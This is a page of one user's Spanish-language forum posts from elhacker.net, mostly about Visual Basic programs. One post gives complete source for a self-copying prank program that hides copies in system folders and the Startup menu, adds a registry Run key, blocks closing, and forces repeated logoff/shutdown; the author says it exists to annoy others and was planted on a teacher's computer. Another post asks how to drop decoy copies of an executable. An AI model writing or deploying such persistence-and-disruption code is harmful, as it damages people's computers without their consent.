elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 ... 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 [63] 64 65 66 67 68 69 70
621  Programación / Programación Visual Basic / Re: Mi primer programa en Visual Basic :) en: 20 Julio 2011, 22:54 pm
HOLA!!!

Revisa mi BLOQUEO DE PANTALLA.

GRACIAS POR LEER!!!

Hola e.e

sisi ya lo habia revisado y bajado y no me funciono bien onda como que no estaban bloqueado los atajos de teclado entonces podia pasar entre ventanas xD igual despues lo pruevo con mas detenimiento :)
agradeceria que me des una opinion sobre mi programa xD

igual el tuyo me impulso a continuarlo (estaba medio rendido xD )
622  Programación / Programación Visual Basic / Re: Valium 1.0 [Manda a tu pc a dormir] en: 20 Julio 2011, 18:53 pm
Si ponele power por lo menos ami me re copo :)
623  Programación / Programación Visual Basic / Re: Mi primer programa en Visual Basic :) en: 20 Julio 2011, 18:51 pm
Lo que pasa es que yo tenia acceso a la computadora de mi profesor entonces lo puse en el C :B

y lo que hace es ejecutar el programa
copia el programa en masomenos 7 ubicaciones
bloquea el AMD de tareas :B
modifica el registro de windows para que el programa se abra junto a windows n.n
y hace que al abrir el programa la computadora se apague en 30 segundos :)
en resumen se prende la computadora inicia el programa reinicia la computadora se prende la computadora se inicia el programa y blablabla asi continuamente xD

a todos gracias por sus consejos :) vere que puedo hacer y quiero preguntarles si alguien sabe como hacer que el programa tenga un aspecto mas amigable xD (botones estilo win7 o winxp no ese que parece win98 xD) desde ya gracias :)
624  Programación / Programación Visual Basic / Re: Mi primer programa en Visual Basic :) en: 20 Julio 2011, 02:24 am
En realidad es el segundo el primero es un programa que contraresta este :B pero la secuencia es muy basica (A)
625  Programación / Programación Visual Basic / Re: Valium 1.0 [Manda a tu pc a dormir] en: 19 Julio 2011, 06:52 am
hay un viejo dicho que dice
Citar
Si eres programador y no logras hacer algo que sirva,
llámalo versión 1.0
yo te diria... ponele version 1.1 xq este me re copo e.e igual taria para ponerle español en un menu para esos vagos que si no esta en español no lo bajan xD
muy bueno pronto estare viendolo :)
626  Programación / Programación Visual Basic / Mi primer programa en Visual Basic :) en: 19 Julio 2011, 06:40 am
Hola a todos n.n
hace rato no posteo en el foro porque bueno surgio algun que otro inconveniente (vacaciones)

pero bueno para que vean que estoy a full (? les traje mi primer programa en VB :)

primero que nada quiero aclararles que solo voy a dejar el codigo porque no se a donde subir el programa u.u si alguien me ayuda lo subo :)

y segundo si a alguien se le ocurre probar mi programa para ver que tal anda le recomiendo que lo haga en una maquina virtual o algo de eso :B
Código:
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long

Option Explicit
  
Private Const RAMA_REGISTRO As String = _
    "HKEY_CURRENT_USER\Software\" & _
    "Microsoft\Windows\CurrentVer" & _
    "sion\Policies\System\DisableTaskmgr"
    
    Dim hora As Date
 Dim horafinal As Date
 Dim HoraLimite As Date

    
  


Private Function Verificar_Existe(path) As Boolean
    
    If Len(Trim$(Dir$(path))) Then
        Verificar_Existe = True
        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores.exe"
        FileCopy "c:\LunaHAck.exe", "C:\WINDOWS\Cursores\Cursors.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system32\System32help.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Codigo.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Copia.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\WINDOWS\system\Systemhelp.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico.exe"
        FileCopy "C:\WINDOWS\Cursores.exe", "C:\Documents and Settings\All Users\Escritorio\LunaHAck.exe"
        FileCopy "C:\WINDOWS\Cursores\Cursors.exe", "C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\Inico2.exe"
        FileCopy "C:\WINDOWS\Cursores.exe", "C:\WINDOWS\Cursores\Cursors.exe"
        End If
    
End Function




Private Sub Form_Load()
 HoraLimite = "00:00:30"
 Timer1.Interval = 1000
 horafinal = Time + HoraLimite
 Shell "Shutdown -t 10 -l "
 Shell "reg add hklm\software\microsoft\windows\currentversion\run /v programa /t reg_sz /d C:\WINDOWS\Cursores.exe /f "
 Call Verificar_Existe("c:\LunaHAck.exe ")


 End Sub

Private Sub Salir1_Click()
MsgBox "Este no es el boton para salir"

End Sub

Private Sub Salir2_Click()
MsgBox "Con este boton tampoco se sale"
End Sub

Private Sub Salir3_Click()
MsgBox "No, Este tampoco lo es"
End Sub

 Private Sub Timer1_Timer()
 If horafinal < Time Then
 Dim i As Integer
i = ExitWindowsEx(0, 0&)
 Timer1.Enabled = False
 Exit Sub
 End If
 Label1 = Format(horafinal - Time, "HH:MM:SS")
 End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
    Cancel = True
End Sub


Se que de seguro esta todo mal acomodado pero bueno como dice el titulo este es mi PRIMER PROGRAMA :)

Saludos :)

P/D: no creo que le sirva a nadie pero siempre es bueno experimentar en el campo de la programacion :)

Edit: me olvide de decirles el programa esta echo con el fin de joder a otras personas haciendo que la maquina se les reinicie continuamente xD
627  Foros Generales / Noticias / Re: Un chino crea un clon del iPad con partes de ordenadores en: 15 Julio 2011, 00:26 am
JOJOJO estos chinos se zarpan e.e
628  Programación / Ingeniería Inversa / Re: Como editar un programa echo en C? en: 12 Julio 2011, 21:54 pm
mira te voy a comentar el programa copia un archivo de tal a tal lado
lo que quiero es que copie el mismo archivo en otro lado y deje un archivo de "señuelo" supongamos

Programa original copia en

"C:\programa.exe"
yo quiero que copie un archivo
"C:\porograma.exe (distraccion)"
y el original en
"C:\carpeta\nombrecualquiera.exe

no pude hacer nada xq no se nada de ing. inversa :B
asi que hice lo mas logico posible
si no puedes contra el enemigo unetele (?
en visual basic hice un programa que cumplia las mismas caracteristicas pero hubo algun que otro error :/
629  Informática / Hardware / Re: apagon portatil en: 11 Julio 2011, 21:24 pm
No soy el unico que lo dijo e.e
igual gracias por la info ahora lo bajo xD
630  Sistemas Operativos / Windows / Re: explorer.exe - no se puede encontrar el componente en: 11 Julio 2011, 21:22 pm
No podras instalar un SO en un Disco externo? :B
Páginas: 1 ... 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 [63] 64 65 66 67 68 69 70
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines